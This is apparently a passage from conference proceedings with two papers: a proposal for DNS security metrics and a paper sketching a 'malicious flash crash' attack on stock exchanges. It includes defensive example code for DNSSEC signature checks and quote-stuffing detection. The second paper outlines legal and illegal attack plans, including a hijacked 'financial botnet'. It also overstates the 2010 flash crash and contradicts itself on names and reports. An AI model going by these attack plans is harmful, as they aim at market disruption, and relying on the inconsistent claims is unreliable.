Abstract: The Domain Name System (DNS) is a fundamental and critical building block of the Internet. Moreover, DNS represents one of the most critical services of information infrastructures, and the strong interdependency between critical infrastructures relying on information and communication technology makes DNS a likely, disruptive target in case of cyber conflict. Critical infrastructures are no longer independent of the Internet: electricity plants, telecommunications services, transportation systems, banks and financial institutions heavily rely on Information and Communication Technology (ICT). New risk scenarios for critical infrastructure protection are expected, in that newer threats propagate through the Internet and exploit Internet infrastructure vulnerabilities, making threats such as cyber espionage, cyber conflict and cyber terrorism a likely possibility that every government should consider in its national security agenda. DNS is vulnerable to a series of threat agents, and these vulnerabilities might be exploited by coordinated groups of attackers to damage national critical assets. A more secure DNS in terms of technology, processes, policy making and organizational structures is needed. The proposal presented in this paper is a work in progress whose main objective is the development of an accepted metrics framework for DNS security and stability. This will be accomplished through a deep state-of-the-art analysis of current DNS metrics and KPIs, the proposal of a new set of KPIs and the subsequent sharing of the results with the DNS community. We believe the definition and collection of these metrics will pave the way to the empirical definition of a DNS stability baseline, leading to the establishment of best practices, standards and acceptable service levels for a consolidated, overarching DNS security policy making framework, and raising awareness of DNS vulnerabilities and threats outside the DNS community.
Keywords: DNS security, security policy, public key infrastructure, security, critical national infrastructure protection
1. DNS and critical (information) infrastructure protection
DNS security and stability (i.e. a guaranteed level of accuracy, performance and dependability) have a direct and strong impact on the performance and dependability of nearly all Internet services and applications, which in turn constitute a foundation for high-performance, scalable services computing, with ever increasing requirements for performance and availability.
Critical infrastructures are no longer independent of the Internet: electricity plants, telecommunications services, transportation systems, banks and financial institutions heavily rely on Information and Communication Technology (ICT); moreover, the corporate networks of critical sector operators are often interconnected with internal control and monitoring systems, in order to make data available for business intelligence needs.
This draws new risk scenarios in which newer threats propagate through the Internet and exploit Internet infrastructure vulnerabilities, making threats such as cyber conflict a likely possibility for any government.
DNS, along with routing protocols, constitutes the core functioning service of the Internet infrastructure, and with the adoption of new Internet infrastructure technologies such as IPv6, DNS security and stability can be considered an even more critical goal affecting the whole cyber community.
2. DNS security issues and possible solutions
As one of the first systems developed for the Internet infrastructure, DNS was designed to be performant and scalable rather than secure.
Nowadays, three major categories of vulnerabilities have been identified for DNS: operating vulnerabilities, process vulnerabilities and policy vulnerabilities.
DNS is susceptible to operating vulnerabilities which can undermine its availability, through Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks, and its integrity, via spoofing and man-in-the-middle attacks, which can lead to cache poisoning and, more generally, to forged responses to client resolvers. Root operators, Country Code Top Level Domain (ccTLD) and Generic Top Level Domain (gTLD) operators have often been targets of this kind of attack in the recent past.
DNS registration services have been found to be an advantageous entry point for phishing campaigns and botnet infrastructures.
Last but not least, DNS core functions are operated through the contributions of root server operators, TLD registries and registrars: these entities operate within their own defined policy frameworks and have no specific obligations or liabilities whenever disruptions occur or they are unable to perform their functions.
DNS Security Extensions (DNSSEC) have been introduced as a security extension to the DNS protocol, finally providing authentication and integrity assurance for DNS data through cryptographic mechanisms that allow DNS records to be signed.
Despite the commitment of the DNS community to gradually adopting DNSSEC, there are some open challenges which have yet to be addressed:
DNSSEC could still be vulnerable to replay attacks due to misconfigured settings for the validity timestamps of signatures and their cached counterparts;
there are still open issues in Public Key Infrastructure (PKI) processes, in particular regarding DNS key lifetime, rollover and verification, especially when considering the interaction between DNSSEC-served zones and standard DNS zones;
a lack of customer demand and missing DNSSEC expertise constitute impeding factors for wide DNSSEC adoption;
there is a general understanding within the DNS community that an overarching collaboration framework is needed, in order to guarantee dedicated organizational structures and agreed-upon DNS security policies.
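As an added illustration of the first open challenge above (example code written for this edit, not code from the paper or its authors): a Python check over constructed RRSIG records that flags signature validity windows a resolver cache could outlive, or that keep an old signature acceptable for too long, and that applies the TTL clamp a validating resolver performs under RFC 4035 §5.3.3. The policy thresholds, the sample zone name and the reference time are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class Rrsig:
    """The RRSIG fields that matter for a validity-window check (RFC 4034 §3.1)."""
    owner: str
    type_covered: str
    ttl: int                # TTL on the RRSIG / covered RRset, in seconds
    original_ttl: int       # Original TTL field of the RRSIG
    inception: datetime     # Signature Inception, UTC
    expiration: datetime    # Signature Expiration, UTC


# Policy thresholds: assumptions made for this example, not values from the paper.
MAX_VALIDITY = timedelta(days=30)   # longest window an old signature stays acceptable
REFRESH_MARGIN = timedelta(days=3)  # re-sign before this much validity is left


def parse_sig_time(text: str) -> datetime:
    """Parse the YYYYMMDDHHmmSS presentation format of RRSIG time fields."""
    return datetime.strptime(text, "%Y%m%d%H%M%S").replace(tzinfo=timezone.utc)


def clamp_ttl(sig: Rrsig, now: datetime) -> int:
    """TTL a validating resolver may cache the RRset for (RFC 4035 §5.3.3):
    no more than the RRset TTL, the Original TTL and the remaining signature
    validity. This is what keeps a cache from holding an RRset after its
    signature has stopped verifying."""
    remaining = int((sig.expiration - now).total_seconds())
    return max(0, min(sig.ttl, sig.original_ttl, remaining))


def check_rrsig(sig: Rrsig, now: datetime) -> list:
    """Return human-readable findings; an empty list means the window looks sane."""
    findings = []
    if sig.expiration <= sig.inception:
        return ["expiration is not after inception"]
    validity = sig.expiration - sig.inception
    if now < sig.inception:
        findings.append("not yet valid: inception in the future or clock skew")
    elif now >= sig.expiration:
        findings.append("signature expired: validating resolvers will reject the RRset")
    else:
        if sig.expiration - now < REFRESH_MARGIN:
            findings.append("below refresh margin: re-sign now to avoid validation failures")
        if now + timedelta(seconds=sig.ttl) > sig.expiration:
            findings.append("TTL outlasts signature expiration: a cache that does not "
                            "clamp the TTL keeps serving a signature that no longer verifies")
    if validity > MAX_VALIDITY:
        findings.append(f"validity window of {validity.days} days exceeds policy: an old "
                        "copy of this RRSIG stays acceptable to validators for that long")
    return findings


# Constructed sample records for a fictional zone; the reference time is arbitrary.
NOW = parse_sig_time("20110707120000")
SAMPLES = {
    "sane": Rrsig("example.test.", "A", 3600, 3600,
                  parse_sig_time("20110706120000"), parse_sig_time("20110720120000")),
    "long-window": Rrsig("example.test.", "MX", 604800, 604800,
                         parse_sig_time("20110329120000"), parse_sig_time("20120328120000")),
    "cache-outlives-sig": Rrsig("example.test.", "NS", 86400, 86400,
                                parse_sig_time("20110701120000"), parse_sig_time("20110707123000")),
    "expired": Rrsig("example.test.", "SOA", 3600, 3600,
                     parse_sig_time("20110620120000"), parse_sig_time("20110707110000")),
}


def run_checks(samples=SAMPLES, now=NOW) -> dict:
    """Check every sample and map its label to the findings list."""
    return {label: check_rrsig(sig, now) for label, sig in samples.items()}


if __name__ == "__main__":
    for label, findings in run_checks().items():
        sig = SAMPLES[label]
        print(f"{label}: cacheable for {clamp_ttl(sig, NOW)}s, {len(findings)} finding(s)")
        for finding in findings:
            print("   -", finding)
```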
DNS is vulnerable to a series of targeted threat agents, and these vulnerabilities might well be exploited by coordinated groups of attackers to damage national critical assets.
To give an example, successful attacks producing forged DNS responses can redirect users’ requests towards infected sites, thus allowing the attackers to install malware on user machines and then propagate through enterprise networks, exploiting misconfigured firewalls, Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS) and operating system vulnerabilities.
This is critical in case of propagation between corporate Local Area Networks (LAN) and the internal control systems of electricity plants or nuclear facilities: the Stuxnet operation, though not producing physical damage or loss of life, proved capable of controlling and altering the behavior of individual field devices; the next step, in which electricity, water supply, oil and gas operators, banking institutions, transportation control systems, telecommunication and public health services are affected, is not necessarily that far off.
It thus becomes evident that, in order to improve the security, stability and resiliency of the DNS, there is a need for:
dedicated activities to define consolidated processes for the DNS Public Key Infrastructure (PKI);
definition and consolidation of standards, system-wide metrics and acceptable service levels;
a large-scale simulation framework to help DNS engineering in what-if and impact analysis of risk scenarios;
definition of a framework for information sharing among DNS ecosystem players;
DNSSEC capacity building activities, dissemination and training for the operators involved.
3. Our proposal: A DNS security metrics framework
In the DNS literature there are numerous studies that characterize DNS traffic (Castro, Wessels, Fomenkov, Claffy 2008; DNS-OARC 2006) and that focus specifically on the performance of the DNS (Ager, Dreger, Feldmann 2006; Ager, Mühlbauer, Smaragdakis, Uhlig 2010; Huang, Holt, Wang, Greenberg, Jin Li, Ross 2010; Jung, Sit, Balakrishnan, Morris 2002; Kolkman 2005; Liston, Srinivasan, Zegura 2002). These research results build a base of knowledge for DNS engineers involved in the design of solutions to improve DNS performance and scalability. Such studies can also provide a knowledge base for DNS policy making.
The fast and frequently unpredictable evolution of Internet applications and technologies has a direct impact on the rapid growth of Internet service demand. This growth necessitates up-to-date and ongoing research and benchmarking of DNS security and stability.
To achieve the goal of understand<strong>in</strong>g and benchmark<strong>in</strong>g DNS security and stability, it is fundamental to<br />
develop new and standard metrics for what stability of the DNS actually means. While the DNS system<br />
has operated <strong>in</strong> a generally reliable and robust fashion for decades, this notion of stability is not<br />
empirically specified, and no way currently exists to specifically assess the stability impacts of<br />
application-driven query volume <strong>in</strong>creases, or technology changes such as DNSSEC. Various studies<br />
(Ager, Dreger, Feldmann 2006; CommunityDNS 2010; Kolkman 2005) have assessed the specific<br />
response to payload <strong>in</strong>creases, but these studies have not provided the ability to correlate the results<br />
with system-wide stability metrics.<br />
The goal of this proposed study is to create a set of metrics that establish a baseline for DNS stability and security by:
- Performing a state-of-the-art study of measurement techniques and metrics used in DNS stability and security evaluation as well as in DNS policy making;
- Comparing the effectiveness of existing metrics and Key Performance Indicators (KPI) in relation to real data;
- Identifying and proposing for standardization a modular/layered framework of measurement techniques, metrics and KPIs to support the design, engineering and governance of the DNS infrastructure;
- Ensuring transparency with respect to the DNS research community in inspecting the measurement data, challenging any results, and building further analyses.
4. Expected outcomes and benefits
We believe that the definition and collection of these metrics will pave the way to the empirical definition of a DNS stability baseline.
While fostering a stronger debate about an overall systemic definition of stability, this quantitative baseline will establish an important benchmark, setting up the basis for the definition of a framework for DNS benchmarking and consistent DNS traffic trend analysis.
Cooperation with the DNS community is fundamental to attain a global and cross-border scope for the research activities.
We envisage that this will also help lead to the establishment of standards and acceptable service levels for a consolidated, overarching DNS security policy-making framework.
In this way, the debate will open up new research opportunities for academic partners, international standards bodies, Internet governance organizations, DNS operators, vendors and researchers.
5. Conclusions
The Internet constitutes a critical infrastructure in its own right; at its core functioning, DNS security represents a global issue in the Internet ecosystem.
In the age of cyber warfare, international debate is open about the applicability of international humanitarian law in case of cyber conflict: in order to preserve and protect core humanitarian services such as telecommunications and emergency services in case of cyber conflict, it would be necessary to promote studies and analysis of DNS security as a critical Internet service, in order to eventually put in place a framework of policies and organizational structures to guarantee better DNS security, stability and resiliency.
A consolidated security metrics framework for DNS will help to start getting a big picture of the DNS health status, identifying major issues and vulnerabilities as well as setting new policies: by having defined metrics in place, it will be possible to perform more intensive simulation-driven predictive analysis of the security impact of DNS on critical infrastructure services.
As a core service of the Internet infrastructure, DNS would likely be an attack target should a cyber conflict occur, and this is the main reason why we believe it is fundamental to put in place solid defense mechanisms for its protection.
References
Ager B., Dreger H., Feldmann A. (2006) "Predicting the DNSSEC overhead using DNS traces", IEEE ISS 2006
Ager B., Mühlbauer W., Smaragdakis G., Uhlig S. (2010) "Comparing DNS Resolvers in the Wild", Proceedings of the Internet Measurement Conference, January 2011
Castro S., Wessels D., Fomenkov M., Claffy K. (2008) "A day at the root of the internet", SIGCOMM Comput. Commun. Rev. 38(5), pp 41-46
CommunityDNS (2010) "Performance testing of BIND, NSD and CDNS platforms on identical hardware"
DNS-OARC "The Day in the Life of the Internet (DITL) project"
Huang C., Holt N., Wang Y.A., Greenberg A., Jin Li, Ross K.W. (2010) "A DNS reflection method for global traffic management", Proceedings of the 2010 USENIX Annual Technical Conference (USENIX ATC'10), USENIX Association, Berkeley, CA, USA, pp 20-20
Jung J., Sit E., Balakrishnan H., Morris R. (2002) "DNS performance and the effectiveness of caching", IEEE/ACM Trans. Netw. 10, pp 589-603
Kolkman O.M. (2005) "Measuring the resource requirements of DNSSEC", RIPE NCC Tech. Report RIPE-352
Liston R., Srinivasan S., Zegura E. (2002) "Diversity in DNS performance measures", Proceedings of the 2nd ACM SIGCOMM Workshop on Internet Measurement (IMW '02), ACM, New York, NY, USA, pp 19-31.
Work in Progress
Malicious Flash Crash Attacks by Quote Stuffing: This is the Way the (Financial) World Could End
Robert Erra
Équipe S&IS, Esiea Paris, France
erra@esiea.fr
Abstract: Cybercrime and cyberterrorism use computers (well, software and networks) to attack targets like critical infrastructures. Computers, software and networks are necessary tools for a cyberattack but can of course also be targets. We propose here to describe a new form of cyberterrorism (or cybercrime) attack, theoretical but with a high probability of realization: a cyberattack on the stock exchange market of some countries, but with legal cyberweapons. The consequences of such an attack could be devastating for the financial and the non-financial world. How is such an attack possible? Well, at the New York Stock Exchange, on May 6th 2010, an astonishing thing happened: all financial transactions during 20 minutes were purely "deleted". This is now called the Flash Crash. Not all details are clearly understood; it seems that so-called "quote stuffing" (or sometimes stub quotes), used in conjunction with High Frequency Trading (HFT), is at the heart of this accidental incident. We have to point out that experts from the SEC do not agree with this hypothesis. We propose in this paper to describe a malicious version of the flash crash: this is a new cyberweapon that can attack a new target, stock exchange places. More precisely, we propose to see this financial incident as what it really is: a Denial Of Services (DOS) of a very new type that we will call a Denial Of Financial Services (DFOS). We recall that a classical DOS attack is simple to do and can be devastating, and so it seems for the DFOS. The basic idea of the scenario of our malicious flash crash attack (MFCA) is simple: we propose to mimic the true flash crash of the New York Stock Exchange. So, a group of cyberterrorists, with just money and computers, following the mechanisms of the MFCA, could create an artificial but truly devastating flash crash. A quick evaluation of the legality of each step of our malicious flash crash attack shows that if quote stuffing is considered legal (its status is a little bit unclear) then the MFCA is absolutely legal. We also propose an illegal version of the MFCA. Is it possible to design a countermeasure against the MFCA? Unfortunately, as long as HFT and quote stuffing are legal, our scenarios are highly plausible, both the legal and the illegal version, and they are not so difficult if you have enough money, or enough cybercriminals.
Keywords: flash crash, quote stuffing, cyberwarfare, cyberterrorism, cyberattack
1. Introduction
Cyberwarfare, cyberterrorism and cybercrime are not such old terms, and many definitions have been given for them. We just recall the "FBI" definition of cyberterrorism (Uda 2009), first proposed by M. Pollit in 1998: "… any premeditated, politically motivated attack against information, computer systems, computer programs, and data which results in violence against non-combatant targets by sub-national or national groups or clandestine agents".
Computers, software and networks are necessary tools for a cyberattack but can of course also be targets (Filiol 2009).
So, is a cyberattack on the stock exchange market of some countries a form of cyberterrorism? This question (Uda 2009) has a complex answer; we give here just a quick answer: yes!
We propose a new scenario, theoretical but with a high probability of realization.
The targets are stock exchange places and, through them, companies, especially financial companies that try to make profits only by "playing" with financial software. Of course, the consequences of such an attack could be devastating for the financial world and, of course, unfortunately also for the non-financial world.
Our basic idea comes from the events at the New York Stock Exchange (NYSE) on May 6th 2010. That day, an astonishing thing happened: almost all financial transactions during 20 minutes were purely "deleted". This is now called the Flash Crash. Not all details are clearly understood; the preliminary report (SEC 2010a) and the final report (SEC 2010b) published by the SEC about the flash crash give a lot of details but no clear, convincing explanation of how to avoid such a flash crash in the future. It seems that so-called "quote stuffing" used in High Frequency Trading (HFT) is at the heart of this accidental incident.
We propose in this paper to investigate possibilities to create a malicious version of the Flash Crash, which we will call the malicious flash crash attack (MFCA). This is a new cyberweapon that can attack a new target: stock exchange places. More precisely, we propose to see this financial incident as what it really is: a Denial Of Services (DOS) of a very new type that we will call a Financial Electronic Denial Of Services (FEDoS). We recall that a classical DOS attack is simple to do and can be devastating, and so it seems for the FEDoS.
The basic idea of the scenario of our MFCA is simple: we propose to mimic the true flash crash of the New York Stock Exchange. So, a group of cyberterrorists, with just money and computers, following the mechanisms of the MFCA, could create an artificial but truly devastating flash crash.
We present here:
- A quick investigation of how such an event happened
- Some arguments to show it is really possible to mimic the flash crash and use it as a new weapon.
An evaluation of the legality of each step of a malicious flash crash attack shows that if quote stuffing is considered legal (its status is a little bit unclear) then the MFCA is absolutely legal. We will present an illegal version of the MFCA. As a conclusion we will propose some topics for future research on this new cyberattack, which is by now a theoretical scenario but with a high probability of realization. For example: is it possible to design "signatures" for quote stuffing techniques, like the virus and malware signatures based on specific patterns used by almost all antivirus software, to identify them in real time? This question has very close connections to questions studied in antivirology research.
2. Some definitions: High frequency trading and quote stuffing
Following Aldridge (Aldridge 2009) and Wikipedia (Wikipedia 2011), High Frequency Trading (HFT) is the execution of computerized trading strategies characterized by unusually short position-holding periods. This is now possible because of the low cost of electronic trading. HFT uses quantitative investment software to hold short-term, or very short-term, positions in equities, options, futures, currencies, and other financial instruments that possess electronic trading capability. HFT seems legal (SEC 2010a, 2010b) and unfortunately quote stuffing is also legal. What is quote stuffing? Generate a large number of orders and cancel them quickly (sometimes within microseconds), and you are doing quote stuffing. We propose a new definition for quote stuffing: a Financial Electronic Denial of Service (FEDoS). This is not so exaggerated; we can find for example in the Nanex report: "… this is an extremely disturbing development, because as more HFT systems start doing this, it is only a matter of time before quote stuffing shuts down the entire market from congestion".
3. The flash crash scenario
The Flash Crash began in the US stock exchange system at 14h 42mn 46s on May 6, 2010. Some software, following the rules of High Frequency Trading, began to do strange things. In a few minutes (SEC 2010a, SEC 2010b):
- Some quote counts changed 5000 times in a second;
- Some trades were executed at prices of a penny ($0.01) or less, as for the Accenture Company;
- Some trades were executed at a price of $100,000.
Eventually, after a few hours, an astonishing thing happened: almost all financial transactions from 14h40 to 15h were purely "deleted". This is now called the flash crash. Not all details are clearly understood, and the final SEC report [1] about the flash crash is still awaited. It seems that so-called "quote stuffing" is at the heart of this accidental incident. On May 15th 2010, the SEC Chairman said "we're outgunned by market supercomputers". Technically this is not exactly true. The problems are HFT algorithms and the fact that quote stuffing is not illegal at all.
4. Two malicious flash crash attacks by quote stuffing
What do we need to conduct a malicious flash crash attack? We need software for HFT, high speed networks, and money. We propose two scenarios: a legal one and an illegal one. Of course, we can imagine a third scenario: a malicious flash crash attack partly legal and partly illegal. We have to point out that if we present these scenarios as a cyberattack, it is possible to imagine that someone, a cyberspeculator, could try such an attack only with the goal of making money. This theoretical flash crash attack by quote stuffing could really be a practical "Financial Weapon of Mass Destruction". This financial attack would still be cyberterrorism.
[1] An example of what we can find in (SEC 2010b): "Still lacking sufficient demand from fundamental buyers or cross-market arbitrageurs, HFTs began to quickly buy and then resell contracts to each other – generating a "hot-potato" volume effect as the same positions were rapidly passed back and forth. Between 2:45:13 and 2:45:27, HFTs traded over 27,000 contracts, which accounted for about 49 percent of the total trading volume, while buying only about 200 additional contracts net."
4.1 The (legal) malicious flash crash attack
We just propose to mimic the true scenario:
- Create some (legal and official) HFT companies in different countries, seemingly independent.
- Wait for some months or years; the companies really work.
- Wait for a "calm day" at the NYSE; July 3 is a good candidate.
- Send a lot of quote stuffing orders, from all the companies, just 5 seconds before the close.
It is difficult to estimate how much money is necessary to make such a scenario efficient, but it seems reasonable to say:
- With 100 million dollars: the scenario is possible, but highly difficult;
- With 1 billion dollars: the scenario is highly possible, less difficult;
- With 10 billion dollars: we can do it without doubt.
Unfortunately, HFT is legal, so we don't see how this scenario could be stopped.
4.2 The (illegal) malicious flash crash attack
We can also imagine the following illegal scenario, forgetting the creation of legal companies:
- Engage a team of experienced cybercriminals.
- Ask them to take control of the local networks of some HFT companies.
- Create a financial botnet.
- Use the botnet to follow the legal scenario.
HFT can really become a new "Financial Weapon of Massive Destruction".
5. Conclusion
As long as HFT and quote stuffing are legal (SEC 2010a, 2010b), our two scenarios are highly plausible, both the legal and the illegal version, and they are not so difficult if you have enough money, or enough cybercriminals. Is there a countermeasure against malicious flash crash attacks? Well, as long as HFT and quote stuffing are legal, it is difficult to imagine such a countermeasure. If someday quote stuffing becomes illegal, then we could imagine the following question, which is in itself a roadmap for future research: is it possible to design "signatures" for quote stuffing techniques, like the virus and malware signatures based on specific patterns used by almost all antivirus software, to identify them in real time? This difficult question has very close connections to questions studied in antivirology research. So, let us hope we will not need anti-HFT or anti-quote-stuffing software.
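As an added, defender-side illustration of the "signature" question raised above (example code, not from the paper): a Python check that flags a symbol-second whose order-event rate, cancel-to-new ratio and order lifetimes together match the quote stuffing pattern the paper describes (many orders per second, nearly all cancelled within microseconds). The feed line format, the thresholds and the sample burst are constructed assumptions.

```python
# Added example, not from the paper: a quote-stuffing "signature" over an order
# event feed. Feed format, thresholds and the sample data are assumptions.
from collections import defaultdict
from dataclasses import dataclass
from statistics import median


@dataclass
class Signature:
    symbol: str
    second: int            # epoch second in which the burst was observed
    events: int            # order events (NEW/CANCEL/FILL) seen in that second
    cancel_ratio: float    # cancels divided by new orders in that second
    median_life_us: float  # median NEW-to-CANCEL lifetime in microseconds


def parse_event(line):
    """Assumed feed line format: '<timestamp_us> <symbol> <action> <order_id>'."""
    ts, symbol, action, order_id = line.split()
    return int(ts), symbol, action, order_id


def detect_quote_stuffing(lines, max_events_per_s=1000,
                          min_cancel_ratio=0.9, max_life_us=1000):
    """Flag (symbol, second) buckets whose event rate, cancel ratio and order
    lifetimes all look like quote stuffing. Thresholds are assumptions; the
    paper reports quote counts that changed 5000 times in one second."""
    events, news, cancels = defaultdict(int), defaultdict(int), defaultdict(int)
    lifetimes = defaultdict(list)
    open_orders = {}  # order_id -> timestamp of its NEW event
    for line in lines:
        ts, symbol, action, order_id = parse_event(line)
        key = (symbol, ts // 1_000_000)
        events[key] += 1
        if action == "NEW":
            news[key] += 1
            open_orders[order_id] = ts
        elif action == "CANCEL":
            cancels[key] += 1
            placed = open_orders.pop(order_id, None)
            if placed is not None:
                lifetimes[key].append(ts - placed)
        # FILL (and any other action) only counts as an event
    flagged = []
    for key in sorted(events):
        ratio = cancels[key] / news[key] if news[key] else 0.0
        life = median(lifetimes[key]) if lifetimes[key] else float("inf")
        if (events[key] >= max_events_per_s and ratio >= min_cancel_ratio
                and life <= max_life_us):
            flagged.append(Signature(key[0], key[1], events[key], ratio, life))
    return flagged


def make_sample_feed():
    """Constructed feed: a stuffing burst on XYZ next to ordinary trading on ABC."""
    lines = []
    t0 = 1_000_000  # timestamps are microseconds; second 1 starts here
    # XYZ: 600 orders inside one second, each cancelled 50 us after placement
    for i in range(600):
        lines.append(f"{t0 + i * 1500} XYZ NEW x{i}")
        lines.append(f"{t0 + i * 1500 + 50} XYZ CANCEL x{i}")
    # ABC: 20 resting orders, 15 filled half a second later, 5 cancelled after 3 s
    for i in range(20):
        placed = t0 + i * 40_000
        lines.append(f"{placed} ABC NEW a{i}")
        if i < 15:
            lines.append(f"{placed + 500_000} ABC FILL a{i}")
        else:
            lines.append(f"{placed + 3_000_000} ABC CANCEL a{i}")
    lines.sort(key=lambda l: int(l.split()[0]))  # replay in time order
    return lines
```

On the constructed feed only XYZ in second 1 is flagged (1200 events, cancel ratio 1.0, median lifetime 50 us); ABC's ordinary fills and slow cancels stay below every threshold.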
References
Aldridge, I. (2009) High-Frequency Trading: A Practical Guide to Algorithmic Strategies and Trading Systems, Wiley.
Nanex (2010) Nanex's Report, June 18, part 4, http://www.nanex.net/20100506/FlashCrashAnalysis_Part4-1.html
Filiol, E. (2009) "Operational aspects of cyberwarfare or cyber-terrorism attacks: what a truly devastating attack could do", ECIW 2009, Lisboa, http://www.esiea-recherche.eu/data/eciw09.pdf
SEC (2010a) Report of the staffs of the CFTC and SEC to the Joint Advisory Committee on Emerging Regulatory Issues, May 18, http://www.sec.gov/sec-cftc-prelimreport.pdf
SEC (2010b) Report of the staffs of the CFTC and SEC to the Joint Advisory Committee on Emerging Regulatory Issues, September 30, http://www.sec.gov/news/studies/2010/marketevents-report.pdf
Uda, R. T. (2009) Cybercrime, Cyberterrorism and Cyberwarfare: Crime, Terror and War without Conventional Weapons, Xlibris.
Wikipedia (2011) "High-frequency trading", http://en.wikipedia.org/wiki/High-frequency_trading